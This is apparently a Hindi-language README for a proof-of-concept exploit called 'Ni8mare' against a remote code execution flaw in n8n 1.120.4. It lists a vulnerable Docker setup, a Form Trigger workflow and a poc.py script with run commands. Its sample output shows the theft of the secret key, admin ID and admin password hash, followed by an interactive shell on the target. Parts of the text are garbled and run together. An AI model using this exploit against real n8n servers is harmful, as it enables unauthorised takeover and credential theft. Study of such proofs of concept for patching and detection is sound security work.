
Ni8mare, n8n RCE
n8n 1.120.4 के लिए PoC वातावरण, जिसमें एक Form Trigger वर्कफ़्लो और एक एक्सप्लॉइट स्क्रिप्ट शामिल है।
Dockerfile — n8n असुरक्षित वातावरण बनाता हैrun.bat — कंटेनर चलाता है (Windows)workflow.txt — n8n वर्कफ़्लो (Form Trigger सहित)poc.py — PoC स्क्रिप्टrequirements.txt — PoC निर्भरताएँdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txt पेस्ट करेंpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, admin पहचानकर्ता) निकालता है।n8n-shell>) प्रदान किया जाता है।id) लक्ष्य वातावरण से आउटपुट मिलता है (RCE)।[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
हम महीने में एक बार CVE और मैलवेयर विश्लेषण प्रकाशित करते हैं। यदि आप रुचि रखते हैं, तो कृपया हमारे प्रकाशनों को देखने के लिए नीचे दिए गए लिंक पर जाएँ।